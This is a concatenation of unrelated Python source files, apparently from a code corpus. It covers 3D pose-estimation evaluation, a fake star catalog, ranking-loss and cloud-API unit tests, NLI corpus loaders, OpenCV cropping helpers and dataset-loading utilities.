inputs_2d, _ = self.eval_data_prepare(self.receptive_field, inputs_2d, None)
inputs_param = torch.from_numpy(np.tile(cam_param, (inputs_2d.shape[0], 1)))
if self.model_config['TRAJECTORY_MODEL']:
return (
self.pos_model_test(inputs_2d, inputs_param) + self.trj_model_test(inputs_2d, inputs_param)
).squeeze(0).cpu().numpy()
else:
return self.pos_model_test(inputs_2d, inputs_param).squeeze(0).cpu().numpy()
if self.model_config['TRAJECTORY_MODEL'] or self.data_config['RAY_ENCODING']:
# do nothing
pass
else:
batch[:, :, 1:] -= batch[:, :, 0:1]
batch[:, :, 0] = 0
inputs_3d = torch.from_numpy(batch.astype('float32'))
inputs_2d, inputs_3d = self.eval_data_prepare(self.receptive_field, inputs_2d, inputs_3d)
inputs_param = torch.from_numpy(np.tile(cam_param, (inputs_2d.shape[0], 1)))
if flip_test:
inputs_2d_flip, _ = self.eval_data_prepare(self.receptive_field, inputs_2d_flip, inputs_3d)
if torch.cuda.is_available():
inputs_2d = inputs_2d.cuda()
inputs_3d = inputs_3d.cuda()
inputs_param = inputs_param.cuda()
if flip_test:
inputs_2d_flip = inputs_2d_flip.cuda()
if self.model_config['TRAJECTORY_MODEL']:
predicted_3d_pos = self.pos_model_test(inputs_2d, inputs_param)
if flip_test:
predicted_3d_pos_flip = self.pos_model_test(inputs_2d_flip, inputs_param)
predicted_3d_pos_flip[:, :, :, 0] *= -1
predicted_3d_pos_flip[:, :, self.kps_left + self.kps_right] = predicted_3d_pos_flip[:, :,
self.kps_right + self.kps_left]
predicted_3d_pos = torch.mean(torch.cat((predicted_3d_pos, predicted_3d_pos_flip), dim=1),
dim=1,
keepdim=True)
predicted_3d_trj = self.trj_model_test(inputs_2d, inputs_param)
if flip_test:
predicted_3d_trj_flip = self.trj_model_test(inputs_2d_flip, inputs_param)
predicted_3d_trj_flip[:, :, :, 0] *= -1
predicted_3d_trj = torch.mean(torch.cat((predicted_3d_trj, predicted_3d_trj_flip), dim=1),
dim=1,
keepdim=True)
predicted_3d_pos += predicted_3d_trj
if not cam is None:
pred = predicted_3d_pos.cpu().numpy()
target = inputs_3d.cpu().numpy()
if self.data_config['RAY_ENCODING']:
pred_world = cam.normalized2world(pred)
target_world = cam.normalized2world(target)
else:
pred_world = cam.camera2world(pred)
target_world = cam.camera2world(target)
predicted_3d_pos = torch.from_numpy(pred_world)
inputs_3d = torch.from_numpy(target_world)
else:
predicted_3d_pos = self.pos_model_test(inputs_2d, inputs_param)
if flip_test:
predicted_3d_pos_flip = self.pos_model_test(inputs_2d_flip, inputs_param)
predicted_3d_pos_flip[:, :, :, 0] *= -1
predicted_3d_pos_flip[:, :, self.kps_left + self.kps_right] = predicted_3d_pos_flip[:, :,
self.kps_right + self.kps_left]
predicted_3d_pos = torch.mean(torch.cat((predicted_3d_pos, predicted_3d_pos_flip), dim=1), dim=1,
keepdim=True)
if self.data_config['RAY_ENCODING']:
                        # ray-encoded outputs: map prediction and target back to world space
pred = predicted_3d_pos.cpu().numpy()
target = inputs_3d.cpu().numpy()
pred_world = cam.normalized2world(pred)
target_world = cam.normalized2world(target)
predicted_3d_pos = torch.from_numpy(pred_world)
inputs_3d = torch.from_numpy(target_world)
else:
# do nothing
pass
epoch_loss_3d_pos += inputs_3d.shape[0] * inputs_3d.shape[1] * mpjpe(predicted_3d_pos, inputs_3d).item()
epoch_loss_3d_root += inputs_3d.shape[0] * inputs_3d.shape[1] * mpjpe(predicted_3d_pos[:, :, 0:1, :], inputs_3d[:, :, 0:1, :]).item()
epoch_loss_3d_pos_scale += inputs_3d.shape[0] * inputs_3d.shape[1] * n_mpjpe(predicted_3d_pos, inputs_3d).item()
inputs = inputs_3d.cpu().numpy().reshape(-1, inputs_3d.shape[-2], inputs_3d.shape[-1])
predicted_3d_pos = predicted_3d_pos.cpu().numpy().reshape(-1, inputs_3d.shape[-2], inputs_3d.shape[-1])
epoch_loss_3d_pos_procrustes += inputs_3d.shape[0] * inputs_3d.shape[1] * p_mpjpe(predicted_3d_pos, inputs)
epoch_loss_3d_vel += inputs_3d.shape[0] * inputs_3d.shape[1] * mean_velocity_error(predicted_3d_pos, inputs)
N += inputs_3d.shape[0] * inputs_3d.shape[1]
e1 = (epoch_loss_3d_pos / N) * 1000
e2 = (epoch_loss_3d_pos_procrustes / N) * 1000
e3 = (epoch_loss_3d_pos_scale / N) * 1000
ev = (epoch_loss_3d_vel / N) * 1000
er = (epoch_loss_3d_root / N) * 1000
return e1, e2, e3, ev, er
def evaluate(self, mlog, subjects_test, pose_data, action_filter, pad, causal_shift, epoch, plot=False):
all_actions = dict()
for subject in subjects_test:
# all_actions.setdefault('Sitting 1', list()).append((subject, 'Sitting 1'))
if action_filter == None:
action_keys = pose_data.get_dataset()[subject].keys()
else:
action_keys = action_filter
for action in action_keys:
all_actions.setdefault(action.split(' ')[0], list()).append((subject, action))
errors_p1 = []
errors_p2 = []
errors_p3 = []
errors_vel = []
errors_root = []
if 'CAMERA_WISE_PERFORMANCE' in self.data_config and self.data_config['CAMERA_WISE_PERFORMANCE']:
camera_dist = pose_data.get_dataset().camera_dist
for cam_idx in range(len(camera_dist)):
cam_id = camera_dist[cam_idx]
for action_key in all_actions.keys():
poses_cam, poses_act, poses_2d_act = pose_data.fetch_via_action(all_actions[action_key], camera_idx=cam_idx)
action_generator = UnchunkedGenerator(poses_cam, poses_act, poses_2d_act,
pad=pad, causal_shift=causal_shift,
kps_left=self.kps_left, kps_right=self.kps_right,
joints_left=self.joints_left, joints_right=self.joints_right)
e1, e2, e3, ev, er = self.evaluate_core(action_generator, action_key,
flip_test=self.train_config['TEST_TIME_AUGMENTATION'])
errors_p1.append(e1)
errors_p2.append(e2)
errors_p3.append(e3)
errors_vel.append(ev)
errors_root.append(er)
p1, p2, p3, p4 = round(np.mean(errors_p1), 1), round(np.mean(errors_p2), 1), round(np.mean(errors_p3), 1), round(np.mean(errors_vel), 1)
p5 = round(np.mean(errors_root), 1)
mlog.info('CAM ID {}, {} {} {} {} {}'.format(cam_id, p1, p2, p3, p4, p5))
else:
for action_key in all_actions.keys():
poses_cam, poses_act, poses_2d_act = pose_data.fetch_via_action(all_actions[action_key])
action_generator = UnchunkedGenerator(poses_cam, poses_act, poses_2d_act,
pad=pad, causal_shift=causal_shift,
kps_left=self.kps_left, kps_right=self.kps_right,
joints_left=self.joints_left, joints_right=self.joints_right)
if action_key is None:
mlog.info('----------')
else:
mlog.info('----' + action_key + '----')
e1, e2, e3, ev, er = self.evaluate_core(action_generator, action_key,
flip_test=self.train_config['TEST_TIME_AUGMENTATION'])
mlog.info('Protocol #1 Error (MPJPE): {} mm'.format(e1))
mlog.info('Protocol #2 Error (P-MPJPE): {} mm'.format(e2))
mlog.info('Protocol #3 Error (N-MPJPE): {} mm'.format(e3))
mlog.info('Velocity Error (MPJVE): {} mm'.format(ev))
mlog.info('Root Error (MRPE): {} mm'.format(er))
mlog.info('----------')
errors_p1.append(e1)
errors_p2.append(e2)
errors_p3.append(e3)
errors_vel.append(ev)
errors_root.append(er)
mlog.info('Protocol #1 (MPJPE) action-wise average: {} mm'.format(round(np.mean(errors_p1), 1)))
mlog.info('Protocol #2 (P-MPJPE) action-wise average: {} mm'.format(round(np.mean(errors_p2), 1)))
mlog.info('Protocol #3 (N-MPJPE) action-wise average: {} mm'.format(round(np.mean(errors_p3), 1)))
mlog.info('Velocity (MPJVE) action-wise average: {} mm'.format(round(np.mean(errors_vel), 1)))
mlog.info('Root (MRPE) action-wise average: {} mm'.format(round(np.mean(errors_root), 1)))
if self.plotter and plot:
self.plotter.log_metric('MPJPE', round(np.mean(errors_p1), 1), epoch)
self.plotter.log_metric('P-MPJPE', round(np.mean(errors_p2), 1), epoch)
self.plotter.log_metric('N-MPJPE', round(np.mean(errors_p3), 1), epoch)
self.plotter.log_metric('MPJVE', round(np.mean(errors_vel), 1), epoch)
def render(self, dataset, keypoints, keypoints_metadata,
pad, causal_shift, kps_left, kps_right, joints_left, joints_right, file_names=None):
viz_subject = self.plot_config['VIZ_SUBJECT']
viz_action = self.plot_config['VIZ_ACTION']
viz_camera = self.plot_config['VIZ_CAMERA']
input_keypoints = keypoints[viz_subject][viz_action][viz_camera].copy()
ground_truth = None
if self.data_config['WORLD_3D_GT_EVAL']:
if viz_subject in dataset.subjects() and viz_action in dataset[viz_subject]:
if 'positions_3d' in dataset[viz_subject][viz_action]:
ground_truth = dataset[viz_subject][viz_action]['positions_3d'][viz_camera].copy()
if ground_truth is None:
print('INFO: this action is unlabeled. Ground truth will not be rendered.')
cam = dataset.camera_info[viz_subject][viz_camera]
render_generator = UnchunkedGenerator([cam], [ground_truth], [input_keypoints],
pad=pad, causal_shift=causal_shift, augment=False,
kps_left=kps_left, kps_right=kps_right,
joints_left=joints_left, joints_right=joints_right)
prediction = self.evaluate_core(render_generator, return_predictions=True).squeeze(axis=1) # remove axis 1
if ground_truth is not None and not self.model_config['TRAJECTORY_MODEL'] and not self.data_config['RAY_ENCODING']:
# Reapply trajectory
trajectory = ground_truth[:, :1]
prediction += trajectory
# Invert camera transformation
if ground_truth is not None:
if self.data_config['RAY_ENCODING']:
pred_world = cam.normalized2world(prediction)
target_world = cam.normalized2world(ground_truth)
else:
pred_world = cam.camera2world(prediction)
target_world = cam.camera2world(ground_truth)
prediction = pred_world
ground_truth = target_world
else:
if self.data_config['RAY_ENCODING']:
pred_world = cam.normalized2world(prediction)
else:
pred_world = cam.camera2world(prediction)
prediction = pred_world
# We don't have the trajectory, but at least we can rebase the height
prediction[:, :, 2] -= np.min(prediction[:, :, 2])
anim_output = {'Reconstruction': prediction}
if ground_truth is not None:
anim_output['Ground truth'] = ground_truth
if self.data_config['RAY_ENCODING']:
pt_cam = cam.get_uv_given_cam_ray(input_keypoints)
input_keypoints = pt_cam[..., :2]
elif self.data_config['INTRINSIC_ENCODING']:
kps_orig = cam.decouple_uv_with_intrinsic(input_keypoints)
input_keypoints = kps_orig
else:
input_keypoints = image_coordinates(input_keypoints[..., :2], w=cam.res_w, h=cam.res_h)
# original video
if self.data_config['DATASET'] == '3dhp':
input_file_names = file_names[viz_subject][viz_action][viz_camera]
input_video_path = None
elif self.data_config['DATASET'] == 'humaneva':
input_file_names = None
input_video_path = None
else:
input_file_names = None
input_video_path = self.plot_config['VIZ_VIDEO']
from lib.visualization.visualization import render_animation
render_animation(input_keypoints, keypoints_metadata, anim_output,
dataset.skeleton(), dataset.fps(), viz_camera, cam.azimuth,
self.plot_config['VIZ_OUTPUT'],
limit=self.plot_config['VIZ_LIMIT'],
downsample=self.plot_config['VIZ_DOWNSAMPLE'],
size=self.plot_config['VIZ_SIZE'],
input_video_path=input_video_path,
viewport=(cam.res_w, cam.res_h),
input_video_skip=self.plot_config['VIZ_SKIP'],
input_file_names = input_file_names
)
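# Typical driver loop for this class (illustrative sketch only; building the
# configs, data generators, the models dict with its 'train_pos'/'test_pos'/
# 'train_trj'/'test_trj' entries, the optimizer and the logger happens elsewhere
# and is not shown here):
#     trainer = Trainer(data_cfg, model_cfg, train_cfg, plot_cfg,
#                       train_gen, test_gen, models, optimizer,
#                       kps_left, kps_right, joints_left, joints_right, plotter)
#     for epoch in range(1, train_cfg['EPOCHS'] + 1):
#         train_mpjpe, lr = trainer.train(epoch, mlog)
#         valid_mpjpe = trainer.test(epoch, mlog)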
|
11482388
|
from EXOSIMS.Prototypes.StarCatalog import StarCatalog
import numpy as np
import astropy.units as u
from astropy.coordinates import SkyCoord
class FakeCatalog_UniformAngles(StarCatalog):
"""Fake Catalog of stars separated uniformly by angle
Generate a fake catalog of stars that are uniformly separated.
Args:
ntargs (int):
            Square root of the number of target stars to generate; an ntargs-by-ntargs grid in RA and Dec is produced.
star_dist (float):
Star distance from observer
specs:
Additional parameters passed to StarCatalog parent class
"""
def __init__(self, ntargs=20, star_dist=5, **specs):
StarCatalog.__init__(self,**specs)
# ntargs must be an integer >= 1
self.ntargs = max(int(ntargs**2), 1)
# putting it all together
raRng = np.linspace( 0,360,ntargs)
decRng = np.linspace(-90, 90,ntargs)
dists = star_dist*np.ones(ntargs**2) *u.pc
ra,dec = np.meshgrid(raRng,decRng)*u.deg
# reference star should be first on the list
coords = SkyCoord(ra.flatten(),dec.flatten(),dists,frame='icrs')
# list of astropy attributes
self.coords = coords # ICRS coordinates
self.ntargs = int(len(self.coords.ra))
self.dist = star_dist*np.ones(self.ntargs)*u.pc # distance
self.parx = self.dist.to('mas', equivalencies=u.parallax()) # parallax
self.pmra = np.zeros(self.ntargs)*u.mas/u.yr # proper motion in RA
self.pmdec = np.zeros(self.ntargs)*u.mas/u.yr # proper motion in DEC
self.rv = np.zeros(self.ntargs)*u.km/u.s # radial velocity
# list of non-astropy attributes to pass target list filters
self.Name = np.array([str(x) for x in range(self.ntargs)]) # star names
self.Spec = np.array(['G']*self.ntargs) # spectral types
self.Umag = np.zeros(self.ntargs) # U magnitude
self.Bmag = np.zeros(self.ntargs) # B magnitude
self.Vmag = 5*np.ones(self.ntargs) # V magnitude
self.Rmag = np.zeros(self.ntargs) # R magnitude
self.Imag = np.zeros(self.ntargs) # I magnitude
self.Jmag = np.zeros(self.ntargs) # J magnitude
self.Hmag = np.zeros(self.ntargs) # H magnitude
self.Kmag = np.zeros(self.ntargs) # K magnitude
self.BV = np.zeros(self.ntargs) # B-V Johnson magnitude
self.MV = self.Vmag - 5*( np.log10(star_dist) - 1 ) # absolute V magnitude
self.BC = -0.10*np.ones(self.ntargs) # bolometric correction
BM = self.MV + self.BC
L0 = 3.0128e28
BMsun = 4.74
self.L = L0*10**(0.4*(BMsun-BM)) # stellar luminosity in ln(SolLum)
self.Binary_Cut = np.zeros(self.ntargs, dtype=bool) # binary closer than 10 arcsec
# populate outspecs
self._outspec['ntargs'] = self.ntargs
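# Usage sketch (illustrative): build a small uniform-angle catalog and inspect
# it. Any extra keyword arguments are forwarded to the StarCatalog prototype,
# whose defaults are assumed to be sufficient here.
if __name__ == "__main__":
    cat = FakeCatalog_UniformAngles(ntargs=10, star_dist=10)
    print(cat.ntargs)      # 100 stars on a 10 x 10 RA/Dec grid
    print(cat.coords[:3])  # ICRS SkyCoord entries at 10 pc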
|
11482441
|
import torch
import numpy as np
from matchzoo import losses
def test_hinge_loss():
true_value = torch.Tensor([[1.2], [1], [1], [1]])
pred_value = torch.Tensor([[1.2], [0.1], [0], [-0.3]])
expected_loss = torch.Tensor([(0 + 1 - 0.3 + 0) / 2.0])
loss = losses.RankHingeLoss()(pred_value, true_value)
assert torch.isclose(expected_loss, loss)
expected_loss = torch.Tensor(
[(2 + 0.1 - 1.2 + 2 - 0.3 + 0) / 2.0])
loss = losses.RankHingeLoss(margin=2)(pred_value, true_value)
assert torch.isclose(expected_loss, loss)
true_value = torch.Tensor(
[[1.2], [1], [0.8], [1], [1], [0.8]])
pred_value = torch.Tensor(
[[1.2], [0.1], [-0.5], [0], [0], [-0.3]])
expected_loss = torch.Tensor(
[(0 + 1 - 0.15) / 2.0])
loss = losses.RankHingeLoss(num_neg=2, margin=1)(
pred_value, true_value)
assert torch.isclose(expected_loss, loss)
def test_rank_crossentropy_loss():
losses.neg_num = 1
def softmax(x):
return np.exp(x) / np.sum(np.exp(x), axis=0)
true_value = torch.Tensor([[1.], [0.], [0.], [1.]])
pred_value = torch.Tensor([[0.8], [0.1], [0.8], [0.1]])
expected_loss = torch.Tensor(
[(-np.log(softmax([0.8, 0.1])[0]) - np.log(
softmax([0.8, 0.1])[1])) / 2])
loss = losses.RankCrossEntropyLoss()(pred_value, true_value)
assert torch.isclose(expected_loss, loss)
true_value = torch.Tensor([[1.], [0.], [0.], [0.], [1.], [0.]])
pred_value = torch.Tensor([[0.8], [0.1], [0.1], [0.8], [0.1], [0.1]])
expected_loss = torch.Tensor(
[(-np.log(softmax([0.8, 0.1, 0.1])[0]) - np.log(
softmax([0.8, 0.1, 0.1])[1])) / 2])
loss = losses.RankCrossEntropyLoss(num_neg=2)(
pred_value, true_value)
assert torch.isclose(expected_loss, loss)
|
11482454
|
import unittest
from cloudwanderer import URN
from ..helpers import CloudWandererCalls, ExpectedCall, MultipleResourceScenario, NoMotoMock, SingleResourceScenario
class TestNatGateways(NoMotoMock, unittest.TestCase):
nat_gateway_payload = {
"CreateTime": "2021-04-13T09:39:49.000Z",
"NatGatewayAddresses": [
{
"AllocationId": "eipalloc-11111111111111111",
"NetworkInterfaceId": "eni-11111111111111111",
"PrivateIp": "10.10.10.78",
}
],
"NatGatewayId": "nat-11111111111111111",
"State": "pending",
"SubnetId": "subnet-11111111",
"VpcId": "vpc-11111111",
"Tags": [{"Key": "Name", "Value": "test-gateway"}],
}
mock = {
"ec2": {
"describe_nat_gateways.return_value": {"NatGateways": [nat_gateway_payload]},
}
}
single_resource_scenarios = [
SingleResourceScenario(
urn=URN.from_string("urn:aws:123456789012:eu-west-2:ec2:nat_gateway:nat-11111111111111111"),
expected_results=[nat_gateway_payload],
expected_call=ExpectedCall(
"ec2", "describe_nat_gateways", [], {"NatGatewayIds": ["nat-11111111111111111"]}
),
)
]
multiple_resource_scenarios = [
MultipleResourceScenario(
arguments=CloudWandererCalls(regions=["eu-west-2"], service_names=["ec2"], resource_types=["nat_gateway"]),
expected_results=[nat_gateway_payload],
)
]
|
11482461
|
import json
import pathlib
import click
import tqdm
import candidate_data
import image_loader
import imagenet
imgnet = imagenet.ImageNetData()
cds = candidate_data.CandidateData(exclude_blacklisted_candidates=False)
loader = image_loader.ImageLoader(imgnet, cds)
all_wnids = list(sorted(list(imgnet.class_info_by_wnid.keys())))
assert len(all_wnids) == 1000
def download_images():
    print('Downloading all candidate images ...')
    for cur_wnid in tqdm.tqdm(all_wnids):
        images_to_download = cds.candidates_by_wnid[cur_wnid]
        images_to_download = [x['id_ours'] for x in images_to_download]
        loader.load_image_bytes_batch(images_to_download, size='scaled_500', verbose=False)
if __name__ == "__main__":
    download_images()
|
11482471
|
import contextily
import matplotlib.pyplot as plt
# `gdf_gent` is assumed to be a GeoDataFrame (with a "no2" column) created in
# an earlier step; it is not defined in this snippet.
fig, ax = plt.subplots(figsize=(15, 15))
ax = gdf_gent.to_crs(3857).plot(column="no2", ax=ax, legend=True, vmax=50)
contextily.add_basemap(ax)
ax.set_axis_off()
|
11482478
|
from __future__ import absolute_import, division, unicode_literals
import treq
import json
from twisted.trial.unittest import SynchronousTestCase
from twisted.internet.task import Clock
from mimic.test.fixtures import APIMockHelper
from mimic.test.helpers import request, json_request
from mimic.rest.glance_api import GlanceApi
from mimic.core import MimicCore
from mimic.resource import MimicRoot
from mimic.canned_responses.json.glance.glance_images_json import image_schema
from mimic.model.glance_objects import random_image_list
class GlanceAPITests(SynchronousTestCase):
"""
Tests for the Glance plugin api
"""
def get_responsebody(self, r):
"""
util json response body
"""
return self.successResultOf(treq.json_content(r))
def setUp(self):
"""
Setup for glance tests
"""
helper = APIMockHelper(self, [GlanceApi()])
self.root = helper.root
self.uri = helper.uri
def test_list_images(self):
"""
List the images returned from glance
"""
req = request(self, self.root, b"GET", self.uri + '/images', b'')
resp = self.successResultOf(req)
self.assertEquals(resp.code, 200)
data = self.get_responsebody(resp)
self.assertEquals(True, 'images' in json.dumps(data))
class GlanceAdminAPITests(SynchronousTestCase):
"""
Tests for the Glance Admin API
"""
def setUp(self):
"""
Initialize core and root
"""
self.core = MimicCore(Clock(), [])
self.root = MimicRoot(self.core).app.resource()
self.uri = "/glance/v2/images"
self.create_request = {"name": "OnMetal - MIMIC", "distro": "linux"}
def create_image(self, request_json=None):
"""
Create image and validate response code.
Return newly created image.
"""
request_json = request_json or self.create_request
(response, content) = self.successResultOf(json_request(
self, self.root, b"POST", self.uri,
body=request_json))
self.assertEqual(response.code, 201)
return content
def list_images(self):
"""
List images and return response
"""
(response, content) = self.successResultOf(json_request(
self, self.root, b"GET", self.uri))
self.assertEqual(200, response.code)
for each in content['images']:
self.assertEqual(each["status"], "active")
return content
def test_list_image_schema(self):
"""
Get the image schema returned from glance admin API
"""
uri = "/glance/v2/schemas/image"
(response, content) = self.successResultOf(json_request(
self, self.root, b"GET", uri))
self.assertEqual(200, response.code)
self.assertEqual(sorted(image_schema.keys()),
sorted(content))
def test_list_images_for_admin(self):
"""
List the images returned from the glance admin api
"""
content = self.list_images()
self.assertEqual(len(random_image_list), len(content['images']))
actual_image_names = [image['name'] for image in content['images']]
expected_image_names = [each['name'] for each in random_image_list]
self.assertEqual(sorted(actual_image_names), sorted(expected_image_names))
def test_list_images_for_admin_consistently(self):
"""
List the images returned from the glance admin api
"""
content1 = self.list_images()
content2 = self.list_images()
self.assertEqual(content2, content1)
def test_create_image(self):
"""
Create Image and validate response
"""
new_image = self.create_image()
self.assertEqual(new_image['name'], self.create_request['name'])
def test_create_image_fails_with_400(self):
"""
Create Image and validate response
"""
request_jsons = [
{}, # nothing
{"name": None}, # invalid name
{"hello": "world"}, # invalid key
{"name": "valid"}, # unspecified distro
]
for each in request_jsons:
(response, content) = self.successResultOf(json_request(
self, self.root, b"POST", self.uri,
body=each))
self.assertEqual(response.code, 400)
def test_get_image(self):
"""
Create then GET Image and validate response
"""
new_image = self.create_image()
(response, content) = self.successResultOf(json_request(
self, self.root, b"GET", self.uri + '/' + new_image['id']))
self.assertEqual(200, response.code)
self.assertEqual(new_image, content)
def test_get_non_existant_image(self):
"""
        Return 404 when trying to GET a non-existent image.
"""
response = self.successResultOf(request(
self, self.root, b"GET", self.uri + '/' + '1111'))
self.assertEqual(404, response.code)
def test_delete_non_existant_image(self):
"""
        Return 404 when trying to DELETE a non-existent image.
"""
response = self.successResultOf(request(
self, self.root, b"DELETE", self.uri + '/' + '1111'))
self.assertEqual(404, response.code)
def test_delete_image(self):
"""
Create and then delete Image and validate response
"""
new_image = self.create_image()
response = self.successResultOf(request(
self, self.root, b"DELETE", self.uri + '/' + new_image['id']))
self.assertEqual(204, response.code)
response = self.successResultOf(request(
self, self.root, b"GET", self.uri + '/' + new_image['id']))
self.assertEqual(404, response.code)
def test_get_then_delete_image(self):
"""
Create and then delete Image and validate response
"""
images = self.list_images()['images']
for each in images[:2]:
response = self.successResultOf(request(
self, self.root, b"DELETE", self.uri + '/' + each['id']))
self.assertEqual(204, response.code)
response = self.successResultOf(request(
self, self.root, b"GET", self.uri + '/' + each['id']))
self.assertEqual(404, response.code)
images_after_delete = self.list_images()['images']
self.assertEqual(len(images),
len(images_after_delete) + 2)
|
11482484
|
import os
from ..utils.io import load_or_create, read_jsonl, load_pickle
from .batch_iterator import BatchIterator
from .. import config
class BaseCorpus(object):
def __init__(
self,
paths_dict,
mode="train",
use_chars=True,
force_reload=False,
train_data_proportion=1.0,
valid_data_proportion=1.0,
batch_size=64,
shuffle_batches=False,
batch_first=True,
):
self.paths = paths_dict
self.mode = mode
self.use_chars = use_chars
self.force_reload = force_reload
self.train_data_proportion = train_data_proportion
self.valid_data_proportion = valid_data_proportion
self.batch_size = batch_size
self.shuffle_batches = shuffle_batches
self.batch_first = batch_first
class MultiNLICorpus(BaseCorpus):
def __init__(
self, *args, max_prem_length=None, max_hypo_length=None, **kwargs
):
super(MultiNLICorpus, self).__init__(
config.corpora_dict["multinli"], *args, **kwargs
)
try:
token_dict = load_pickle(config.MULTINLI_TOKEN_DICT_PICKLE_PATH)
char_dict = load_pickle(config.MULTINLI_CHAR_DICT_PICKLE_PATH)
self.word2index = token_dict["token2id"]
self.char2index = char_dict["char2id"]
except FileNotFoundError:
exit(
"dict files not found. Try running the preprocessing "
"script first"
)
basename = os.path.basename(self.paths["train"])
filename_no_ext = os.path.splitext(basename)[0]
train_pickle_path = os.path.join(
config.CACHE_PATH, filename_no_ext + ".pkl"
)
self.train_data = load_or_create(
train_pickle_path,
read_jsonl,
self.paths["train"],
force_reload=self.force_reload,
)
# We use a set to eliminate duplicate entries
self.label_ids = set([example["label_id"] for example in self.train_data])
self.label_ids = list(self.label_ids)
self.train_batches = BatchIterator(
self.train_data,
self.batch_size,
data_proportion=self.train_data_proportion,
shuffle=self.shuffle_batches,
batch_first=self.batch_first,
use_chars=self.use_chars,
)
basename = os.path.basename(self.paths["dev_matched"])
filename_no_ext = os.path.splitext(basename)[0]
dev_matched_pickle_path = os.path.join(
config.CACHE_PATH, filename_no_ext + ".pkl"
)
self.dev_matched_data = load_or_create(
dev_matched_pickle_path,
read_jsonl,
self.paths["dev_matched"],
force_reload=self.force_reload,
)
self.dev_matched_batches = BatchIterator(
self.dev_matched_data,
self.batch_size,
data_proportion=self.valid_data_proportion,
shuffle=False,
batch_first=self.batch_first,
use_chars=self.use_chars,
)
# For compatibility
self.dev_batches = self.dev_matched_batches
basename = os.path.basename(self.paths["dev_mismatched"])
filename_no_ext = os.path.splitext(basename)[0]
dev_mismatched_pickle_path = os.path.join(
config.CACHE_PATH, filename_no_ext + ".pkl"
)
self.dev_mismatched_data = load_or_create(
dev_mismatched_pickle_path,
read_jsonl,
self.paths["dev_mismatched"],
force_reload=self.force_reload,
)
self.dev_mismatched_batches = BatchIterator(
self.dev_mismatched_data,
self.batch_size,
data_proportion=self.valid_data_proportion,
shuffle=False,
batch_first=self.batch_first,
use_chars=self.use_chars,
)
class SNLICorpus(BaseCorpus):
def __init__(
self, *args, max_prem_length=None, max_hypo_length=None, **kwargs
):
super(SNLICorpus, self).__init__(
config.corpora_dict["snli"], *args, **kwargs
)
try:
token_dict = load_pickle(config.SNLI_TOKEN_DICT_PICKLE_PATH)
char_dict = load_pickle(config.SNLI_CHAR_DICT_PICKLE_PATH)
self.word2index = token_dict["token2id"]
self.char2index = char_dict["char2id"]
except FileNotFoundError:
exit(
"dict files not found. Try running the preprocessing "
"script first"
)
basename = os.path.basename(self.paths["train"])
filename_no_ext = os.path.splitext(basename)[0]
train_pickle_path = os.path.join(
config.CACHE_PATH, filename_no_ext + ".pkl"
)
self.train_data = load_or_create(
train_pickle_path,
read_jsonl,
self.paths["train"],
force_reload=self.force_reload,
)
# We use a set to eliminate duplicate entries
self.label_ids = set([example["label_id"] for example in self.train_data])
self.label_ids = list(self.label_ids)
self.train_batches = BatchIterator(
self.train_data,
self.batch_size,
data_proportion=self.train_data_proportion,
shuffle=self.shuffle_batches,
batch_first=self.batch_first,
use_chars=self.use_chars,
)
basename = os.path.basename(self.paths["dev"])
filename_no_ext = os.path.splitext(basename)[0]
dev_pickle_path = os.path.join(
config.CACHE_PATH, filename_no_ext + ".pkl"
)
self.dev_data = load_or_create(
dev_pickle_path,
read_jsonl,
self.paths["dev"],
force_reload=self.force_reload,
)
self.dev_batches = BatchIterator(
self.dev_data,
self.batch_size,
data_proportion=self.valid_data_proportion,
shuffle=False,
batch_first=self.batch_first,
use_chars=self.use_chars,
)
basename = os.path.basename(self.paths["test"])
filename_no_ext = os.path.splitext(basename)[0]
test_pickle_path = os.path.join(
config.CACHE_PATH, filename_no_ext + ".pkl"
)
self.test_data = load_or_create(
test_pickle_path,
read_jsonl,
self.paths["test"],
force_reload=self.force_reload,
)
self.test_batches = BatchIterator(
self.test_data,
self.batch_size,
data_proportion=1.0,
shuffle=False,
batch_first=self.batch_first,
use_chars=self.use_chars,
)
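# Usage sketch (illustrative): both corpora expose BatchIterator attributes
# (e.g. train_batches, dev_batches) built from the preprocessed jsonl files,
# so the preprocessing script must have been run first. The keyword arguments
# below are the BaseCorpus options defined above.
if __name__ == "__main__":
    corpus = SNLICorpus(batch_size=32, shuffle_batches=True)
    print("label ids:", corpus.label_ids)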
|
11482499
|
import cv2
import numpy as np
# Function to rotate the image
def rotateImage(image, angle):
image_center = tuple(np.array(image.shape[1::-1]) / 2)
rot_mat = cv2.getRotationMatrix2D(image_center, angle, 1.0)
result = cv2.warpAffine(image, rot_mat, image.shape[1::-1], flags=cv2.INTER_LINEAR)
return result
# Function to crop top border in the image
def cropImage(image,x):
#x determine how far to cut the image
#fileb determines with what name we are going to save the image
#Determine image dimensions
height, width, channels = image.shape
crop_img = image[x:height, 0:width]
return crop_img
# Function to crop every box (there are 81 boxes in total)
def cropBox(image,x,y,h,w):
#Each side of the square / box has a side of length 10
crop_img = image[x:(x+h), y:(y+w)]
return crop_img
# Function to save the image
def saveImage(image,fileb):
new_path = "./Images/"
cv2.imwrite(new_path + fileb, image)
cv2.waitKey(0)
cv2.destroyAllWindows()
# Function to crop all borders of each box
def cropBorder(image):
#Determine image dimensions
height, width, channels = image.shape
crop_img = image[12:height-12, 12:width-12]
return crop_img
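# Usage sketch (illustrative; "board.jpg" and the crop offsets below are
# placeholder values, not taken from the original script):
if __name__ == "__main__":
    import os
    if os.path.exists("board.jpg"):
        img = cv2.imread("board.jpg")
        img = rotateImage(img, 3)           # straighten slightly
        img = cropImage(img, 40)            # drop the top border
        box = cropBox(img, 0, 0, 30, 30)    # one box at the top-left corner
        saveImage(cropBorder(box), "box_0_0.png")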
|
11482571
|
import os
from code_search import shared, serialize
from code_search.data_manager import DataManager, get_base_languages_data_manager
def rename_dedupe_definitions_keys(doc):
doc['code'] = doc.pop('function')
doc['code_tokens'] = doc.pop('function_tokens')
return doc
def rename_set_doc_keys(doc):
doc['identifier'] = doc.pop('func_name')
return doc
def get_base_language_doc_path(language: str, set_: shared.DataSet, idx: int) -> str:
return os.path.join(
shared.CODESEARCHNET_DATA_DIR, language, 'final', 'jsonl', str(set_), f'{language}_{set_}_{idx}')
def get_codesearchnet_language_set_corpus(language: str, set_: shared.DataSet):
if set_ == shared.DataSet.TRAIN:
file_paths = [get_base_language_doc_path(language, set_, i)
for i in range(shared.LANGUAGES_NUM_FILES[language])]
else:
file_paths = [get_base_language_doc_path(language, set_, 0)]
for file_path in file_paths:
yield from serialize.load('jsonl-gzip', file_path)
def combine_language_set_corpus(data_manager: DataManager, language: str, set_: shared.DataSet):
